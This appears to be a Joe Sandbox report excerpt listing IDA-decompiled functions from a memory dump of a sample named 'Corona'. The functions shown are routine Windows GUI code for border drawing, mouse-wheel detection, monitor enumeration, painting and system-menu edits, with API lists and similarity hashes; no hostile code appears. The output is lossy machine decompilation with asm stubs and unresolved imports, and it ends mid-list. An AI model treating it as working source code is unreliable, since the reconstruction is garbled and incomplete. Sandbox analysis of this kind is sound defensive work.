                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 55%
                                  			E00435BB0(intOrPtr* __eax, intOrPtr __edx) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* _v64;
                                  				struct HDC__* _t120;
                                  				void* _t171;
                                  				intOrPtr* _t193;
                                  				intOrPtr* _t196;
                                  				intOrPtr _t205;
                                  				void* _t208;
                                  				intOrPtr _t216;
                                  				signed int _t234;
                                  				void* _t237;
                                  				void* _t239;
                                  				intOrPtr _t240;
                                  
                                  				_t237 = _t239;
                                  				_t240 = _t239 + 0xffffffc4;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                  					_t120 = E00434EF4(_v8);
                                  					_push(_t120);
                                  					L00406484();
                                  					_v16 = _t120;
                                  					_push(_t237);
                                  					_push(0x435e16);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t240;
                                  					GetClientRect(E00434EF4(_v8),  &_v32);
                                  					GetWindowRect(E00434EF4(_v8),  &_v48);
                                  					MapWindowPoints(0, E00434EF4(_v8),  &_v48, 2);
                                  					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                  					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					if( *(_v8 + 0x165) != 0) {
                                  						_t208 = 0;
                                  						if( *(_v8 + 0x163) != 0) {
                                  							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						if( *(_v8 + 0x164) != 0) {
                                  							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
                                  						}
                                  						_t234 = GetWindowLongA(E00434EF4(_v8), 0xfffffff0);
                                  						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                  							_v48.left = _v48.left - _t208;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                  							_v48.top = _v48.top - _t208;
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                  							_v48.right = _v48.right + _t208;
                                  						}
                                  						if((_t234 & 0x00200000) != 0) {
                                  							_t196 =  *0x450e7c; // 0x4528f8
                                  							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
                                  						}
                                  						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                  							_v48.bottom = _v48.bottom + _t208;
                                  						}
                                  						if((_t234 & 0x00100000) != 0) {
                                  							_t193 =  *0x450e7c; // 0x4528f8
                                  							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
                                  						}
                                  						DrawEdge(_v16,  &_v48,  *(0x450aa0 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x450ab0 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x450ac0 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x450ad0 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                  					}
                                  					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                  					FillRect(_v16,  &_v48, E0041CC2C( *((intOrPtr*)(_v8 + 0x170))));
                                  					_pop(_t216);
                                  					 *[fs:eax] = _t216;
                                  					_push(0x435e1d);
                                  					_push(_v16);
                                  					_t171 = E00434EF4(_v8);
                                  					_push(_t171);
                                  					L004065C4();
                                  					return _t171;
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 - 0x10))();
                                  					_t205 = E004280CC(E00427FEC());
                                  					if(_t205 != 0) {
                                  						_t205 = _v8;
                                  						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
                                  							_t205 = E004285FC(E00427FEC(), 0, _v8);
                                  						}
                                  					}
                                  					return _t205;
                                  				}
                                  			}

                                  APIs
                                  • 72E7B080.USER32(00000000), ref: 00435BE4
                                  • GetClientRect.USER32 ref: 00435C07
                                  • GetWindowRect.USER32 ref: 00435C19
                                  • MapWindowPoints.USER32 ref: 00435C2F
                                  • OffsetRect.USER32(?,?,?), ref: 00435C44
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 00435C5D
                                  • InflateRect.USER32(?,00000000,00000000), ref: 00435C7B
                                  • GetWindowLongA.USER32 ref: 00435CD1
                                  • DrawEdge.USER32(?,?,00000000,00000008), ref: 00435D9D
                                  • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00435DB6
                                  • OffsetRect.USER32(?,?,?), ref: 00435DD5
                                  • FillRect.USER32 ref: 00435DF1
                                  • 72E7B380.USER32(00000000,?,00435E1D,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00435E10
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$Window$ClipOffset$B080B380ClientDrawEdgeExcludeFillInflateIntersectLongPoints
                                  • String ID:
                                  • API String ID: 156109915-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040684C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                  				intOrPtr* _v8;
                                  				struct HWND__* _t19;
                                  				int* _t20;
                                  				int* _t26;
                                  				int* _t27;
                                  
                                  				_t26 = _t20;
                                  				_t27 = __edx;
                                  				_v8 = __eax;
                                  				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                  				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                                  				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                                  				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                                  				if( *_t27 == 0 || _t19 == 0) {
                                  					 *_a8 = 0;
                                  				} else {
                                  					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                                  				}
                                  				if( *_t26 == 0 || _t19 == 0) {
                                  					 *_a4 = 3;
                                  				} else {
                                  					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                                  				}
                                  				return _t19;
                                  			}









                                  APIs
                                  • FindWindowA.USER32 ref: 00406864
                                  • RegisterClipboardFormatA.USER32 ref: 00406870
                                  • RegisterClipboardFormatA.USER32 ref: 0040687F
                                  • RegisterClipboardFormatA.USER32 ref: 0040688B
                                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004068A3
                                  • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004068C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                                  • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                  • API String ID: 1416857345-3736581797
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E004285FC(void* __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				struct tagRECT _v28;
                                  				struct tagRECT _v44;
                                  				char _v56;
                                  				char _v72;
                                  				signed char _t43;
                                  				struct HDC__* _t55;
                                  				void* _t74;
                                  				signed int _t77;
                                  				int _t78;
                                  				int _t79;
                                  				void* _t92;
                                  				intOrPtr _t105;
                                  				void* _t114;
                                  				void* _t117;
                                  				void* _t120;
                                  				void* _t122;
                                  				intOrPtr _t123;
                                  
                                  				_t120 = _t122;
                                  				_t123 = _t122 + 0xffffffbc;
                                  				_t92 = __ecx;
                                  				_v8 = __edx;
                                  				_t114 = __eax;
                                  				_t43 = GetWindowLongA(E00434EF4(_v8), 0xffffffec);
                                  				if((_t43 & 0x00000002) == 0) {
                                  					return _t43;
                                  				} else {
                                  					GetWindowRect(E00434EF4(_v8),  &_v44);
                                  					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                  					_t55 = E00434EF4(_v8);
                                  					_push(_t55);
                                  					L00406484();
                                  					_v12 = _t55;
                                  					_push(_t120);
                                  					_push(0x428757);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t123;
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_t117 = _t114;
                                  					if(_t92 != 0) {
                                  						_t77 = GetWindowLongA(E00434EF4(_v8), 0xfffffff0);
                                  						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                                  							_t78 = GetSystemMetrics(2);
                                  							_t79 = GetSystemMetrics(3);
                                  							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                  							E004122C4(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							_t117 = _t117;
                                  							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                  						}
                                  					}
                                  					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                  					E00428234( &_v56, 2);
                                  					E00428188(_t117,  &_v56, _v12, 0,  &_v44);
                                  					_pop(_t105);
                                  					 *[fs:eax] = _t105;
                                  					_push(0x42875e);
                                  					_push(_v12);
                                  					_t74 = E00434EF4(_v8);
                                  					_push(_t74);
                                  					L004065C4();
                                  					return _t74;
                                  				}
                                  			}























                                  APIs
                                  • GetWindowLongA.USER32 ref: 00428617
                                  • GetWindowRect.USER32 ref: 00428632
                                  • OffsetRect.USER32(?,?,?), ref: 00428647
                                  • 72E7B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428655
                                  • GetWindowLongA.USER32 ref: 00428686
                                  • GetSystemMetrics.USER32 ref: 0042869B
                                  • GetSystemMetrics.USER32 ref: 004286A4
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 004286B3
                                  • GetSysColorBrush.USER32(0000000F), ref: 004286E0
                                  • FillRect.USER32 ref: 004286EE
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00428757,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428713
                                  • 72E7B380.USER32(00000000,?,0042875E,?,?,00000000,00428757,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00428751
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$Window$LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                                  • String ID:
                                  • API String ID: 3936689491-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00423D28(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                  				struct tagPOINT _v12;
                                  				int _v16;
                                  				struct tagRECT _v32;
                                  				struct tagRECT _v48;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t60;
                                  				int _t61;
                                  				RECT* _t64;
                                  				struct HDC__* _t65;
                                  
                                  				_t64 = _a8;
                                  				_t65 = _a4;
                                  				if( *0x452927 != 0) {
                                  					_t61 = 0;
                                  					if(_a12 == 0) {
                                  						L14:
                                  						return _t61;
                                  					}
                                  					_v32.left = 0;
                                  					_v32.top = 0;
                                  					_v32.right = GetSystemMetrics(0);
                                  					_v32.bottom = GetSystemMetrics(1);
                                  					if(_t65 == 0) {
                                  						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							L13:
                                  							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                  						} else {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					}
                                  					_v16 = GetClipBox(_t65,  &_v48);
                                  					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                  						goto L14;
                                  					}
                                  					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                  					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                  						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                  							goto L13;
                                  						}
                                  						if(_v16 == 1) {
                                  							_t61 = 1;
                                  						}
                                  						goto L14;
                                  					} else {
                                  						goto L13;
                                  					}
                                  				}
                                  				 *0x452914 = E0042377C(7, _t60,  *0x452914, _t64, _t65);
                                  				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                  				goto L14;
                                  			}
















                                  APIs
                                  • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00423D61
                                  • GetSystemMetrics.USER32 ref: 00423D86
                                  • GetSystemMetrics.USER32 ref: 00423D91
                                  • GetClipBox.GDI32(?,?), ref: 00423DA3
                                  • GetDCOrgEx.GDI32(?,?), ref: 00423DB0
                                  • OffsetRect.USER32(?,?,?), ref: 00423DC9
                                  • IntersectRect.USER32 ref: 00423DDA
                                  • IntersectRect.USER32 ref: 00423DF0
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                  • String ID: EnumDisplayMonitors
                                  • API String ID: 362875416-2491903729
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E00433084(intOrPtr* __eax, void* __edx) {
                                  				struct HDC__* _v8;
                                  				void* _v12;
                                  				void* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				intOrPtr _v84;
                                  				void* _v96;
                                  				struct HDC__* _v104;
                                  				void* _v112;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t38;
                                  				struct HDC__* _t47;
                                  				struct HDC__* _t55;
                                  				intOrPtr* _t83;
                                  				intOrPtr _t102;
                                  				void* _t103;
                                  				void* _t108;
                                  				void* _t111;
                                  				void* _t113;
                                  				intOrPtr _t114;
                                  
                                  				_t111 = _t113;
                                  				_t114 = _t113 + 0xffffff94;
                                  				_push(_t103);
                                  				_t108 = __edx;
                                  				_t83 = __eax;
                                  				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                  					if(( *(_t83 + 0x55) & 0x00000001) != 0 || E00431C90(_t83) != 0) {
                                  						_t38 = E00432BA8(_t83, _t83, _t108, _t103, _t108);
                                  					} else {
                                  						_t38 =  *((intOrPtr*)( *_t83 - 0x10))();
                                  					}
                                  					return _t38;
                                  				} else {
                                  					L0040638C();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					 *((intOrPtr*)( *__eax + 0x44))();
                                  					_t47 = _v104;
                                  					L00406034();
                                  					_v12 = _t47;
                                  					L004065C4();
                                  					L0040603C();
                                  					_v8 = _t47;
                                  					_v16 = SelectObject(_v8, _v12);
                                  					 *[fs:eax] = _t114;
                                  					_t55 = BeginPaint(E00434EF4(_t83),  &_v80);
                                  					E0042F98C(_t83, _v8, 0x14, _v8);
                                  					 *((intOrPtr*)(_t108 + 4)) = _v8;
                                  					E00433084(_t83, _t108);
                                  					 *((intOrPtr*)(_t108 + 4)) = 0;
                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v8, 0, 0, 0xcc0020,  *[fs:eax], 0x4331d6, _t111, 0, 0, __eax, __eax, _t47, _v84, 0);
                                  					 *((intOrPtr*)( *_t83 + 0x44))(_v84);
                                  					_push(_v104);
                                  					_push(0);
                                  					_push(0);
                                  					L00406014();
                                  					EndPaint(E00434EF4(_t83),  &_v80);
                                  					_t102 = _t55;
                                  					 *[fs:eax] = _t102;
                                  					_push(0x4331dd);
                                  					SelectObject(_v8, _v16);
                                  					DeleteDC(_v8);
                                  					return DeleteObject(_v12);
                                  				}
                                  			}


























                                  APIs
                                  • 72E7AC50.USER32(00000000), ref: 004330CF
                                  • 72E7A520.GDI32(00000000,?), ref: 004330F3
                                  • 72E7B380.USER32(00000000,00000000,00000000,?), ref: 004330FE
                                  • 72E7A590.GDI32(00000000,00000000,00000000,00000000,?), ref: 00433105
                                  • SelectObject.GDI32(00000000,?), ref: 00433115
                                  • BeginPaint.USER32(00000000,?,00000000,004331D6,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00433137
                                  • 72E897E0.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00433193
                                  • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004331A4
                                  • SelectObject.GDI32(00000000,?), ref: 004331BE
                                  • DeleteDC.GDI32(00000000), ref: 004331C7
                                  • DeleteObject.GDI32(?), ref: 004331D0
                                    • Part of subcall function 00432BA8: BeginPaint.USER32(00000000,?), ref: 00432BCE
                                    • Part of subcall function 00432BA8: EndPaint.USER32(00000000,?,00432CCF), ref: 00432CC2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Paint$Object$BeginDeleteSelect$A520A590B380E897
                                  • String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B0F0(void* __edx, void* __edi, void* __fp0) {
                                  				void _v1024;
                                  				char _v1088;
                                  				long _v1092;
                                  				void* _t12;
                                  				char* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t18;
                                  				intOrPtr _t24;
                                  				long _t32;
                                  
                                  				E0040AF68(_t12,  &_v1024, __edx, __fp0, 0x400);
                                  				_t14 =  *0x451028; // 0x452048
                                  				if( *_t14 == 0) {
                                  					_t16 =  *0x450df8; // 0x406a7c
                                  					_t9 = _t16 + 4; // 0xffe9
                                  					_t18 =  *0x452664; // 0x400000
                                  					LoadStringA(E00404EE8(_t18),  *_t9,  &_v1088, 0x40);
                                  					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                  				}
                                  				_t24 =  *0x450e48; // 0x452218
                                  				E00402824(E004029A4(_t24));
                                  				CharToOemA( &_v1024,  &_v1024);
                                  				_t32 = E00408270( &_v1024, __edi);
                                  				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                                  				return WriteFile(GetStdHandle(0xfffffff4), 0x40b1b4, 2,  &_v1092, 0);
                                  			}












                                  APIs
                                    • Part of subcall function 0040AF68: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                    • Part of subcall function 0040AF68: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                    • Part of subcall function 0040AF68: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                    • Part of subcall function 0040AF68: LoadStringA.USER32 ref: 0040B05A
                                  • CharToOemA.USER32 ref: 0040B127
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040B144
                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B14A
                                  • GetStdHandle.KERNEL32(000000F4,0040B1B4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B15F
                                  • WriteFile.KERNEL32(00000000,000000F4,0040B1B4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040B165
                                  • LoadStringA.USER32 ref: 0040B187
                                  • MessageBoxA.USER32 ref: 0040B19D
                                  Strings
                                  Similarity
                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                  • String ID: H E$|j@
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00432D00(void* __eax, void* __ecx, struct HDC__* __edx) {
                                  				struct tagRECT _v44;
                                  				struct tagRECT _v60;
                                  				void* _v68;
                                  				int _v80;
                                  				int _t79;
                                  				void* _t134;
                                  				int _t135;
                                  				void* _t136;
                                  				void* _t159;
                                  				void* _t160;
                                  				void* _t161;
                                  				struct HDC__* _t162;
                                  				intOrPtr* _t163;
                                  
                                  				_t163 =  &(_v44.bottom);
                                  				_t134 = __ecx;
                                  				_t162 = __edx;
                                  				_t161 = __eax;
                                  				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                  				}
                                  				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                  				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                  					L17:
                                  					_t79 =  *(_t161 + 0x19c);
                                  					if(_t79 == 0) {
                                  						L27:
                                  						return _t79;
                                  					}
                                  					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                  					if(_t79 < 0) {
                                  						goto L27;
                                  					}
                                  					_v44.right = _t79 + 1;
                                  					_t159 = 0;
                                  					do {
                                  						_t79 = E004136F8( *(_t161 + 0x19c), _t159);
                                  						_t135 = _t79;
                                  						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                  							_v44.left = CreateSolidBrush(E0041BF6C(0xff000010));
                                  							E004122C4( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                  							FrameRect(_t162,  &_v44, _v44);
                                  							DeleteObject(_v60.right);
                                  							_v60.left = CreateSolidBrush(E0041BF6C(0xff000014));
                                  							E004122C4( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                  							FrameRect(_t162,  &_v60, _v60);
                                  							_t79 = DeleteObject(_v68);
                                  						}
                                  						_t159 = _t159 + 1;
                                  						_t75 =  &(_v44.right);
                                  						 *_t75 = _v44.right - 1;
                                  					} while ( *_t75 != 0);
                                  					goto L27;
                                  				}
                                  				_t160 = 0;
                                  				if(_t134 != 0) {
                                  					_t160 = E00413754(_t78, _t134);
                                  					if(_t160 < 0) {
                                  						_t160 = 0;
                                  					}
                                  				}
                                  				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                  				if(_t160 <  *_t163) {
                                  					do {
                                  						_t136 = E004136F8( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                  						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                  							E004122C4( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                  							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                  								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                  									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                  								}
                                  								_v60.top = SaveDC(_t162);
                                  								E0042D130(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                  								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                  								E0042F98C(_t136, _t162, 0xf, 0);
                                  								RestoreDC(_t162, _v80);
                                  								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                  							}
                                  						}
                                  						_t160 = _t160 + 1;
                                  					} while (_t160 < _v60.top);
                                  				}
                                  			}
















                                  APIs
                                  Similarity
                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                  • String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044951C(intOrPtr _a4) {
                                  				intOrPtr _t27;
                                  				struct HMENU__* _t48;
                                  
                                  				_t27 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((char*)(_t27 + 0x229)) != 0) {
                                  					_t27 =  *((intOrPtr*)(_a4 - 4));
                                  					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                  						_t27 =  *((intOrPtr*)(_a4 - 4));
                                  						if( *((char*)(_t27 + 0x22f)) != 1) {
                                  							_t48 = GetSystemMenu(E00434EF4( *((intOrPtr*)(_a4 - 4))), 0);
                                  							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                  								DeleteMenu(_t48, 0xf130, 0);
                                  								DeleteMenu(_t48, 7, 0x400);
                                  								DeleteMenu(_t48, 5, 0x400);
                                  								DeleteMenu(_t48, 0xf030, 0);
                                  								DeleteMenu(_t48, 0xf020, 0);
                                  								DeleteMenu(_t48, 0xf000, 0);
                                  								return DeleteMenu(_t48, 0xf120, 0);
                                  							}
                                  							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                  								EnableMenuItem(_t48, 0xf020, 1);
                                  							}
                                  							_t27 =  *((intOrPtr*)(_a4 - 4));
                                  							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                  								return EnableMenuItem(_t48, 0xf030, 1);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}





                                  APIs
                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00449567
                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00449585
                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00449592
